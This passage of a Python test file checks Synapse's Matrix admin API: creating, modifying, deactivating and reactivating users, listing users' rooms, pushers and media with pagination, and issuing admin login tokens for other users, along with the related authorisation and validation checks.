"avatar_url": None,
}
)
request, channel = self.make_request(
"PUT",
url,
access_token=self.admin_user_tok,
content=body.encode(encoding="utf_8"),
)
self.assertEqual(201, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob:test", channel.json_body["name"])
self.assertEqual("Bob's name", channel.json_body["displayname"])
self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
self.assertEqual("bob@bob.bob", channel.json_body["threepids"][0]["address"])
self.assertEqual(True, channel.json_body["admin"])
# Get user
request, channel = self.make_request(
"GET", url, access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob:test", channel.json_body["name"])
self.assertEqual("Bob's name", channel.json_body["displayname"])
self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
self.assertEqual("bob@bob.bob", channel.json_body["threepids"][0]["address"])
self.assertEqual(True, channel.json_body["admin"])
self.assertEqual(False, channel.json_body["is_guest"])
self.assertEqual(False, channel.json_body["deactivated"])
def test_create_user(self):
"""
Check that a new regular user is created successfully.
"""
url = "/_synapse/admin/v2/users/@bob:test"
# Create user
body = json.dumps(
{
"password": "abc123",
"admin": False,
"displayname": "Bob's name",
"threepids": [{"medium": "email", "address": "bob@bob.bob"}],
}
)
request, channel = self.make_request(
"PUT",
url,
access_token=self.admin_user_tok,
content=body.encode(encoding="utf_8"),
)
self.assertEqual(201, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob:test", channel.json_body["name"])
self.assertEqual("Bob's name", channel.json_body["displayname"])
self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
self.assertEqual("bob@bob.bob", channel.json_body["threepids"][0]["address"])
self.assertEqual(False, channel.json_body["admin"])
# Get user
request, channel = self.make_request(
"GET", url, access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob:test", channel.json_body["name"])
self.assertEqual("Bob's name", channel.json_body["displayname"])
self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
self.assertEqual("bob@bob.bob", channel.json_body["threepids"][0]["address"])
self.assertEqual(False, channel.json_body["admin"])
self.assertEqual(False, channel.json_body["is_guest"])
self.assertEqual(False, channel.json_body["deactivated"])
@override_config(
{"limit_usage_by_mau": True, "max_mau_value": 2, "mau_trial_days": 0}
)
def test_create_user_mau_limit_reached_active_admin(self):
"""
Check that an admin can register a new user via the admin API
even if the MAU limit is reached.
Admin user was active before creating user.
"""
handler = self.hs.get_registration_handler()
# Sync to set admin user to active
# before limit of monthly active users is reached
request, channel = self.make_request(
"GET", "/sync", access_token=self.admin_user_tok
)
if channel.code != 200:
raise HttpResponseException(
channel.code, channel.result["reason"], channel.result["body"]
)
# Set monthly active users to the limit
self.store.get_monthly_active_count = Mock(
return_value=make_awaitable(self.hs.config.max_mau_value)
)
# Check that the blocking of monthly active users is working as expected
# The registration of a new user fails due to the limit
self.get_failure(
handler.register_user(localpart="local_part"), ResourceLimitError
)
# Register new user with admin API
url = "/_synapse/admin/v2/users/@bob:test"
# Create user
body = json.dumps({"password": "abc123", "admin": False})
request, channel = self.make_request(
"PUT",
url,
access_token=self.admin_user_tok,
content=body.encode(encoding="utf_8"),
)
self.assertEqual(201, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob:test", channel.json_body["name"])
self.assertEqual(False, channel.json_body["admin"])
@override_config(
{"limit_usage_by_mau": True, "max_mau_value": 2, "mau_trial_days": 0}
)
def test_create_user_mau_limit_reached_passive_admin(self):
"""
Check that an admin can register a new user via the admin API
even if the MAU limit is reached.
Admin user was not active before creating user.
"""
handler = self.hs.get_registration_handler()
# Set monthly active users to the limit
self.store.get_monthly_active_count = Mock(
return_value=make_awaitable(self.hs.config.max_mau_value)
)
# Check that the blocking of monthly active users is working as expected
# The registration of a new user fails due to the limit
self.get_failure(
handler.register_user(localpart="local_part"), ResourceLimitError
)
# Register new user with admin API
url = "/_synapse/admin/v2/users/@bob:test"
# Create user
body = json.dumps({"password": "abc123", "admin": False})
request, channel = self.make_request(
"PUT",
url,
access_token=self.admin_user_tok,
content=body.encode(encoding="utf_8"),
)
# Admin user is not blocked by mau anymore
self.assertEqual(201, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob:test", channel.json_body["name"])
self.assertEqual(False, channel.json_body["admin"])
@override_config(
{
"email": {
"enable_notifs": True,
"notif_for_new_users": True,
"notif_from": "test@example.com",
},
"public_baseurl": "https://example.com",
}
)
def test_create_user_email_notif_for_new_users(self):
"""
Check that a new regular user is created successfully and
got an email pusher.
"""
url = "/_synapse/admin/v2/users/@bob:test"
# Create user
body = json.dumps(
{
"password": "abc123",
"threepids": [{"medium": "email", "address": "bob@bob.bob"}],
}
)
request, channel = self.make_request(
"PUT",
url,
access_token=self.admin_user_tok,
content=body.encode(encoding="utf_8"),
)
self.assertEqual(201, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob:test", channel.json_body["name"])
self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
self.assertEqual("bob@bob.bob", channel.json_body["threepids"][0]["address"])
pushers = self.get_success(
self.store.get_pushers_by({"user_name": "@bob:test"})
)
pushers = list(pushers)
self.assertEqual(len(pushers), 1)
self.assertEqual("@bob:test", pushers[0]["user_name"])
@override_config(
{
"email": {
"enable_notifs": False,
"notif_for_new_users": False,
"notif_from": "test@example.com",
},
"public_baseurl": "https://example.com",
}
)
def test_create_user_email_no_notif_for_new_users(self):
"""
Check that a new regular user is created successfully and
got not an email pusher.
"""
url = "/_synapse/admin/v2/users/@bob:test"
# Create user
body = json.dumps(
{
"password": "abc123",
"threepids": [{"medium": "email", "address": "bob@bob.bob"}],
}
)
request, channel = self.make_request(
"PUT",
url,
access_token=self.admin_user_tok,
content=body.encode(encoding="utf_8"),
)
self.assertEqual(201, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob:test", channel.json_body["name"])
self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
self.assertEqual("bob@bob.bob", channel.json_body["threepids"][0]["address"])
pushers = self.get_success(
self.store.get_pushers_by({"user_name": "@bob:test"})
)
pushers = list(pushers)
self.assertEqual(len(pushers), 0)
def test_set_password(self):
"""
Test setting a new password for another user.
"""
# Change password
body = json.dumps({"password": "hahaha"})
request, channel = self.make_request(
"PUT",
self.url_other_user,
access_token=self.admin_user_tok,
content=body.encode(encoding="utf_8"),
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
def test_set_displayname(self):
"""
Test setting the displayname of another user.
"""
# Modify user
body = json.dumps({"displayname": "foobar"})
request, channel = self.make_request(
"PUT",
self.url_other_user,
access_token=self.admin_user_tok,
content=body.encode(encoding="utf_8"),
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@user:test", channel.json_body["name"])
self.assertEqual("foobar", channel.json_body["displayname"])
# Get user
request, channel = self.make_request(
"GET", self.url_other_user, access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@user:test", channel.json_body["name"])
self.assertEqual("foobar", channel.json_body["displayname"])
def test_set_threepid(self):
"""
Test setting threepid for an other user.
"""
# Delete old and add new threepid to user
body = json.dumps(
{"threepids": [{"medium": "email", "address": "bob3@bob.bob"}]}
)
request, channel = self.make_request(
"PUT",
self.url_other_user,
access_token=self.admin_user_tok,
content=body.encode(encoding="utf_8"),
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@user:test", channel.json_body["name"])
self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
self.assertEqual("bob3@bob.bob", channel.json_body["threepids"][0]["address"])
# Get user
request, channel = self.make_request(
"GET", self.url_other_user, access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@user:test", channel.json_body["name"])
self.assertEqual("email", channel.json_body["threepids"][0]["medium"])
self.assertEqual("bob3@bob.bob", channel.json_body["threepids"][0]["address"])
def test_deactivate_user(self):
"""
Test deactivating another user.
"""
# Deactivate user
body = json.dumps({"deactivated": True})
request, channel = self.make_request(
"PUT",
self.url_other_user,
access_token=self.admin_user_tok,
content=body.encode(encoding="utf_8"),
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@user:test", channel.json_body["name"])
self.assertEqual(True, channel.json_body["deactivated"])
# the user is deactivated, the threepid will be deleted
# Get user
request, channel = self.make_request(
"GET", self.url_other_user, access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@user:test", channel.json_body["name"])
self.assertEqual(True, channel.json_body["deactivated"])
def test_reactivate_user(self):
"""
Test reactivating another user.
"""
# Deactivate the user.
request, channel = self.make_request(
"PUT",
self.url_other_user,
access_token=self.admin_user_tok,
content=json.dumps({"deactivated": True}).encode(encoding="utf_8"),
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self._is_erased("@user:test", False)
d = self.store.mark_user_erased("@user:test")
self.assertIsNone(self.get_success(d))
self._is_erased("@user:test", True)
# Attempt to reactivate the user (without a password).
request, channel = self.make_request(
"PUT",
self.url_other_user,
access_token=self.admin_user_tok,
content=json.dumps({"deactivated": False}).encode(encoding="utf_8"),
)
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
# Reactivate the user.
request, channel = self.make_request(
"PUT",
self.url_other_user,
access_token=self.admin_user_tok,
content=json.dumps({"deactivated": False, "password": "foo"}).encode(
encoding="utf_8"
),
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
# Get user
request, channel = self.make_request(
"GET", self.url_other_user, access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@user:test", channel.json_body["name"])
self.assertEqual(False, channel.json_body["deactivated"])
self._is_erased("@user:test", False)
def test_set_user_as_admin(self):
"""
Test setting the admin flag on a user.
"""
# Set a user as an admin
body = json.dumps({"admin": True})
request, channel = self.make_request(
"PUT",
self.url_other_user,
access_token=self.admin_user_tok,
content=body.encode(encoding="utf_8"),
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@user:test", channel.json_body["name"])
self.assertEqual(True, channel.json_body["admin"])
# Get user
request, channel = self.make_request(
"GET", self.url_other_user, access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@user:test", channel.json_body["name"])
self.assertEqual(True, channel.json_body["admin"])
def test_accidental_deactivation_prevention(self):
"""
Ensure an account can't accidentally be deactivated by using a str value
for the deactivated body parameter
"""
url = "/_synapse/admin/v2/users/@bob:test"
# Create user
body = json.dumps({"password": "abc123"})
request, channel = self.make_request(
"PUT",
url,
access_token=self.admin_user_tok,
content=body.encode(encoding="utf_8"),
)
self.assertEqual(201, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob:test", channel.json_body["name"])
self.assertEqual("bob", channel.json_body["displayname"])
# Get user
request, channel = self.make_request(
"GET", url, access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob:test", channel.json_body["name"])
self.assertEqual("bob", channel.json_body["displayname"])
self.assertEqual(0, channel.json_body["deactivated"])
# Change password (and use a str for deactivate instead of a bool)
body = json.dumps({"password": "abc123", "deactivated": "false"}) # oops!
request, channel = self.make_request(
"PUT",
url,
access_token=self.admin_user_tok,
content=body.encode(encoding="utf_8"),
)
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
# Check user is not deactivated
request, channel = self.make_request(
"GET", url, access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual("@bob:test", channel.json_body["name"])
self.assertEqual("bob", channel.json_body["displayname"])
# Ensure they're still alive
self.assertEqual(0, channel.json_body["deactivated"])
def _is_erased(self, user_id, expect):
"""Assert that the user is erased or not
"""
d = self.store.is_user_erased(user_id)
if expect:
self.assertTrue(self.get_success(d))
else:
self.assertFalse(self.get_success(d))
class UserMembershipRestTestCase(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
room.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.other_user = self.register_user("user", "pass")
self.url = "/_synapse/admin/v1/users/%s/joined_rooms" % urllib.parse.quote(
self.other_user
)
def test_no_auth(self):
"""
Try to list rooms of an user without authentication.
"""
request, channel = self.make_request("GET", self.url, b"{}")
self.assertEqual(401, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])
def test_requester_is_no_admin(self):
"""
If the user is not a server admin, an error is returned.
"""
other_user_token = self.login("user", "pass")
request, channel = self.make_request(
"GET", self.url, access_token=other_user_token,
)
self.assertEqual(403, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])
def test_user_does_not_exist(self):
"""
Tests that a lookup for a user that does not exist returns a 404
"""
url = "/_synapse/admin/v1/users/@unknown_person:test/joined_rooms"
request, channel = self.make_request(
"GET", url, access_token=self.admin_user_tok,
)
self.assertEqual(404, channel.code, msg=channel.json_body)
self.assertEqual(Codes.NOT_FOUND, channel.json_body["errcode"])
def test_user_is_not_local(self):
"""
Tests that a lookup for a user that is not a local returns a 400
"""
url = "/_synapse/admin/v1/users/@unknown_person:unknown_domain/joined_rooms"
request, channel = self.make_request(
"GET", url, access_token=self.admin_user_tok,
)
self.assertEqual(400, channel.code, msg=channel.json_body)
self.assertEqual("Can only lookup local users", channel.json_body["error"])
def test_no_memberships(self):
"""
Tests that a normal lookup for rooms is successfully
if user has no memberships
"""
# Get rooms
request, channel = self.make_request(
"GET", self.url, access_token=self.admin_user_tok,
)
self.assertEqual(200, channel.code, msg=channel.json_body)
self.assertEqual(0, channel.json_body["total"])
self.assertEqual(0, len(channel.json_body["joined_rooms"]))
def test_get_rooms(self):
"""
Tests that a normal lookup for rooms is successfully
"""
# Create rooms and join
other_user_tok = self.login("user", "pass")
number_rooms = 5
for n in range(number_rooms):
self.helper.create_room_as(self.other_user, tok=other_user_tok)
# Get rooms
request, channel = self.make_request(
"GET", self.url, access_token=self.admin_user_tok,
)
self.assertEqual(200, channel.code, msg=channel.json_body)
self.assertEqual(number_rooms, channel.json_body["total"])
self.assertEqual(number_rooms, len(channel.json_body["joined_rooms"]))
class PushersRestTestCase(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.other_user = self.register_user("user", "pass")
self.url = "/_synapse/admin/v1/users/%s/pushers" % urllib.parse.quote(
self.other_user
)
def test_no_auth(self):
"""
Try to list pushers of an user without authentication.
"""
request, channel = self.make_request("GET", self.url, b"{}")
self.assertEqual(401, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])
def test_requester_is_no_admin(self):
"""
If the user is not a server admin, an error is returned.
"""
other_user_token = self.login("user", "pass")
request, channel = self.make_request(
"GET", self.url, access_token=other_user_token,
)
self.assertEqual(403, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])
def test_user_does_not_exist(self):
"""
Tests that a lookup for a user that does not exist returns a 404
"""
url = "/_synapse/admin/v1/users/@unknown_person:test/pushers"
request, channel = self.make_request(
"GET", url, access_token=self.admin_user_tok,
)
self.assertEqual(404, channel.code, msg=channel.json_body)
self.assertEqual(Codes.NOT_FOUND, channel.json_body["errcode"])
def test_user_is_not_local(self):
"""
Tests that a lookup for a user that is not a local returns a 400
"""
url = "/_synapse/admin/v1/users/@unknown_person:unknown_domain/pushers"
request, channel = self.make_request(
"GET", url, access_token=self.admin_user_tok,
)
self.assertEqual(400, channel.code, msg=channel.json_body)
self.assertEqual("Can only lookup local users", channel.json_body["error"])
def test_get_pushers(self):
"""
Tests that a normal lookup for pushers is successfully
"""
# Get pushers
request, channel = self.make_request(
"GET", self.url, access_token=self.admin_user_tok,
)
self.assertEqual(200, channel.code, msg=channel.json_body)
self.assertEqual(0, channel.json_body["total"])
# Register the pusher
other_user_token = self.login("user", "pass")
user_tuple = self.get_success(
self.store.get_user_by_access_token(other_user_token)
)
token_id = user_tuple.token_id
self.get_success(
self.hs.get_pusherpool().add_pusher(
user_id=self.other_user,
access_token=token_id,
kind="http",
app_id="m.http",
app_display_name="HTTP Push Notifications",
device_display_name="pushy push",
pushkey="a@example.com",
lang=None,
data={"url": "example.com"},
)
)
# Get pushers
request, channel = self.make_request(
"GET", self.url, access_token=self.admin_user_tok,
)
self.assertEqual(200, channel.code, msg=channel.json_body)
self.assertEqual(1, channel.json_body["total"])
for p in channel.json_body["pushers"]:
self.assertIn("pushkey", p)
self.assertIn("kind", p)
self.assertIn("app_id", p)
self.assertIn("app_display_name", p)
self.assertIn("device_display_name", p)
self.assertIn("profile_tag", p)
self.assertIn("lang", p)
self.assertIn("url", p["data"])
class UserMediaRestTestCase(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.media_repo = hs.get_media_repository_resource()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.other_user = self.register_user("user", "pass")
self.url = "/_synapse/admin/v1/users/%s/media" % urllib.parse.quote(
self.other_user
)
def test_no_auth(self):
"""
Try to list media of an user without authentication.
"""
request, channel = self.make_request("GET", self.url, b"{}")
self.assertEqual(401, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])
def test_requester_is_no_admin(self):
"""
If the user is not a server admin, an error is returned.
"""
other_user_token = self.login("user", "pass")
request, channel = self.make_request(
"GET", self.url, access_token=other_user_token,
)
self.assertEqual(403, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])
def test_user_does_not_exist(self):
"""
Tests that a lookup for a user that does not exist returns a 404
"""
url = "/_synapse/admin/v1/users/@unknown_person:test/media"
request, channel = self.make_request(
"GET", url, access_token=self.admin_user_tok,
)
self.assertEqual(404, channel.code, msg=channel.json_body)
self.assertEqual(Codes.NOT_FOUND, channel.json_body["errcode"])
def test_user_is_not_local(self):
"""
Tests that a lookup for a user that is not a local returns a 400
"""
url = "/_synapse/admin/v1/users/@unknown_person:unknown_domain/media"
request, channel = self.make_request(
"GET", url, access_token=self.admin_user_tok,
)
self.assertEqual(400, channel.code, msg=channel.json_body)
self.assertEqual("Can only lookup local users", channel.json_body["error"])
def test_limit(self):
"""
Testing list of media with limit
"""
number_media = 20
other_user_tok = self.login("user", "pass")
self._create_media(other_user_tok, number_media)
request, channel = self.make_request(
"GET", self.url + "?limit=5", access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(channel.json_body["total"], number_media)
self.assertEqual(len(channel.json_body["media"]), 5)
self.assertEqual(channel.json_body["next_token"], 5)
self._check_fields(channel.json_body["media"])
def test_from(self):
"""
Testing list of media with a defined starting point (from)
"""
number_media = 20
other_user_tok = self.login("user", "pass")
self._create_media(other_user_tok, number_media)
request, channel = self.make_request(
"GET", self.url + "?from=5", access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(channel.json_body["total"], number_media)
self.assertEqual(len(channel.json_body["media"]), 15)
self.assertNotIn("next_token", channel.json_body)
self._check_fields(channel.json_body["media"])
def test_limit_and_from(self):
"""
Testing list of media with a defined starting point and limit
"""
number_media = 20
other_user_tok = self.login("user", "pass")
self._create_media(other_user_tok, number_media)
request, channel = self.make_request(
"GET", self.url + "?from=5&limit=10", access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(channel.json_body["total"], number_media)
self.assertEqual(channel.json_body["next_token"], 15)
self.assertEqual(len(channel.json_body["media"]), 10)
self._check_fields(channel.json_body["media"])
def test_limit_is_negative(self):
"""
Testing that a negative limit parameter returns a 400
"""
request, channel = self.make_request(
"GET", self.url + "?limit=-5", access_token=self.admin_user_tok,
)
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(Codes.INVALID_PARAM, channel.json_body["errcode"])
def test_from_is_negative(self):
"""
Testing that a negative from parameter returns a 400
"""
request, channel = self.make_request(
"GET", self.url + "?from=-5", access_token=self.admin_user_tok,
)
self.assertEqual(400, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(Codes.INVALID_PARAM, channel.json_body["errcode"])
def test_next_token(self):
"""
Testing that `next_token` appears at the right place
"""
number_media = 20
other_user_tok = self.login("user", "pass")
self._create_media(other_user_tok, number_media)
# `next_token` does not appear
# Number of results is the number of entries
request, channel = self.make_request(
"GET", self.url + "?limit=20", access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(channel.json_body["total"], number_media)
self.assertEqual(len(channel.json_body["media"]), number_media)
self.assertNotIn("next_token", channel.json_body)
# `next_token` does not appear
# Number of max results is larger than the number of entries
request, channel = self.make_request(
"GET", self.url + "?limit=21", access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(channel.json_body["total"], number_media)
self.assertEqual(len(channel.json_body["media"]), number_media)
self.assertNotIn("next_token", channel.json_body)
# `next_token` does appear
# Number of max results is smaller than the number of entries
request, channel = self.make_request(
"GET", self.url + "?limit=19", access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(channel.json_body["total"], number_media)
self.assertEqual(len(channel.json_body["media"]), 19)
self.assertEqual(channel.json_body["next_token"], 19)
# Check
# Set `from` to value of `next_token` for request remaining entries
# `next_token` does not appear
request, channel = self.make_request(
"GET", self.url + "?from=19", access_token=self.admin_user_tok,
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(channel.json_body["total"], number_media)
self.assertEqual(len(channel.json_body["media"]), 1)
self.assertNotIn("next_token", channel.json_body)
def test_user_has_no_media(self):
"""
Tests that a normal lookup for media is successfully
if user has no media created
"""
request, channel = self.make_request(
"GET", self.url, access_token=self.admin_user_tok,
)
self.assertEqual(200, channel.code, msg=channel.json_body)
self.assertEqual(0, channel.json_body["total"])
self.assertEqual(0, len(channel.json_body["media"]))
def test_get_media(self):
"""
Tests that a normal lookup for media is successfully
"""
number_media = 5
other_user_tok = self.login("user", "pass")
self._create_media(other_user_tok, number_media)
request, channel = self.make_request(
"GET", self.url, access_token=self.admin_user_tok,
)
self.assertEqual(200, channel.code, msg=channel.json_body)
self.assertEqual(number_media, channel.json_body["total"])
self.assertEqual(number_media, len(channel.json_body["media"]))
self.assertNotIn("next_token", channel.json_body)
self._check_fields(channel.json_body["media"])
def _create_media(self, user_token, number_media):
"""
Create a number of media for a specific user
"""
upload_resource = self.media_repo.children[b"upload"]
for i in range(number_media):
# file size is 67 Byte
image_data = unhexlify(
b"89504e470d0a1a0a0000000d4948445200000001000000010806"
b"0000001f15c4890000000a49444154789c63000100000500010d"
b"0a2db40000000049454e44ae426082"
)
# Upload some media into the room
self.helper.upload_media(
upload_resource, image_data, tok=user_token, expect_code=200
)
def _check_fields(self, content):
"""Checks that all attributes are present in content
"""
for m in content:
self.assertIn("media_id", m)
self.assertIn("media_type", m)
self.assertIn("media_length", m)
self.assertIn("upload_name", m)
self.assertIn("created_ts", m)
self.assertIn("last_access_ts", m)
self.assertIn("quarantined_by", m)
self.assertIn("safe_from_quarantine", m)
class UserTokenRestTestCase(unittest.HomeserverTestCase):
"""Test for /_synapse/admin/v1/users/<user>/login
"""
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
sync.register_servlets,
room.register_servlets,
devices.register_servlets,
logout.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.other_user = self.register_user("user", "pass")
self.other_user_tok = self.login("user", "pass")
self.url = "/_synapse/admin/v1/users/%s/login" % urllib.parse.quote(
self.other_user
)
def _get_token(self) -> str:
request, channel = self.make_request(
"POST", self.url, b"{}", access_token=self.admin_user_tok
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
return channel.json_body["access_token"]
def test_no_auth(self):
"""Try to login as a user without authentication.
"""
request, channel = self.make_request("POST", self.url, b"{}")
self.assertEqual(401, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])
def test_not_admin(self):
"""Try to login as a user as a non-admin user.
"""
request, channel = self.make_request(
"POST", self.url, b"{}", access_token=self.other_user_tok
)
self.assertEqual(403, int(channel.result["code"]), msg=channel.result["body"])
def test_send_event(self):
"""Test that sending event as a user works.
"""
# Create a room.
room_id = self.helper.create_room_as(self.other_user, tok=self.other_user_tok)
# Login in as the user
puppet_token = self._get_token()
# Test that sending works, and generates the event as the right user.
resp = self.helper.send_event(room_id, "com.example.test", tok=puppet_token)
event_id = resp["event_id"]
event = self.get_success(self.store.get_event(event_id))
self.assertEqual(event.sender, self.other_user)
def test_devices(self):
"""Tests that logging in as a user doesn't create a new device for them.
"""
# Login in as the user
self._get_token()
# Check that we don't see a new device in our devices list
request, channel = self.make_request(
"GET", "devices", b"{}", access_token=self.other_user_tok
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
# We should only see the one device (from the login in `prepare`)
self.assertEqual(len(channel.json_body["devices"]), 1)
def test_logout(self):
"""Test that calling `/logout` with the token works.
"""
# Login in as the user
puppet_token = self._get_token()
# Test that we can successfully make a request
request, channel = self.make_request(
"GET", "devices", b"{}", access_token=puppet_token
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
# Logout with the puppet token
request, channel = self.make_request(
"POST", "logout", b"{}", access_token=puppet_token
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
# The puppet token should no longer work
request, channel = self.make_request(
"GET", "devices", b"{}", access_token=puppet_token
)
self.assertEqual(401, int(channel.result["code"]), msg=channel.result["body"])
# .. but the real user's tokens should still work
request, channel = self.make_request(
"GET", "devices", b"{}", access_token=self.other_user_tok
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
def test_user_logout_all(self):
"""Tests that the target user calling `/logout/all` does *not* expire
the token.
"""
# Login in as the user
puppet_token = self._get_token()
# Test that we can successfully make a request
request, channel = self.make_request(
"GET", "devices", b"{}", access_token=puppet_token
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
# Logout all with the real user token
request, channel = self.make_request(
"POST", "logout/all", b"{}", access_token=self.other_user_tok
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
# The puppet token should still work
request, channel = self.make_request(
"GET", "devices", b"{}", access_token=puppet_token
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
# .. but the real user's tokens shouldn't
request, channel = self.make_request(
"GET", "devices", b"{}", access_token=self.other_user_tok
)
self.assertEqual(401, int(channel.result["code"]), msg=channel.result["body"])
def test_admin_logout_all(self):
"""Tests that the admin user calling `/logout/all` does expire the
token.
"""
# Login in as the user
puppet_token = self._get_token()
# Test that we can successfully make a request
request, channel = self.make_request(
"GET", "devices", b"{}", access_token=puppet_token
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
# Logout all with the admin user token
request, channel = self.make_request(
"POST", "logout/all", b"{}", access_token=self.admin_user_tok
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
# The puppet token should no longer work
request, channel = self.make_request(
"GET", "devices", b"{}", access_token=puppet_token
)
self.assertEqual(401, int(channel.result["code"]), msg=channel.result["body"])
# .. but the real user's tokens should still work
request, channel = self.make_request(
"GET", "devices", b"{}", access_token=self.other_user_tok
)
self.assertEqual(200, int(channel.result["code"]), msg=channel.result["body"])
@unittest.override_config(
{
"public_baseurl": "https://example.org/",
"user_consent": {
"version": "1.0",
"policy_name": "My Cool Privacy Policy",
"template_dir": "/",
"require_at_registration": True,
"block_events_error": "You should accept the policy",
},
"form_secret": "123secret",
}
)
def test_consent(self):
"""Test that sending a message is not subject to the privacy policies.
"""
# Have the admin user accept the terms.
self.get_success(self.store.user_set_consent_version(self.admin_user, "1.0"))
# First, cheekily accept the terms and create a room
self.get_success(self.store.user_set_consent_version(self.other_user, "1.0"))
room_id = self.helper.create_room_as(self.other_user, tok=self.other_user_tok)
self.helper.send_event(room_id, "com.example.test", tok=self.other_user_tok)
# Now unaccept it and check that we can't send an event
self.get_success(self.store.user_set_consent_version(self.other_user, "0.0"))
self.helper.send_event(
room_id, "com.example.test", tok=self.other_user_tok, expect_code=403
)
# Login in as the user
puppet_token = self._get_token()
# Sending an event on their behalf should work fine
self.helper.send_event(room_id, "com.example.test", tok=puppet_token)
@override_config(
{"limit_usage_by_mau": True, "max_mau_value": 1, "mau_trial_days": 0}
)
def test_mau_limit(self):
# Create a room as the admin user. This will bump the monthly active users to 1.
room_id = self.helper.create_room_as(self.admin_user, tok=self.admin_user_tok)
# Trying to join as the other user should fail due to reaching MAU limit.
self.helper.join(
room_id, user=self.other_user, tok=self.other_user_tok, expect_code=403
)
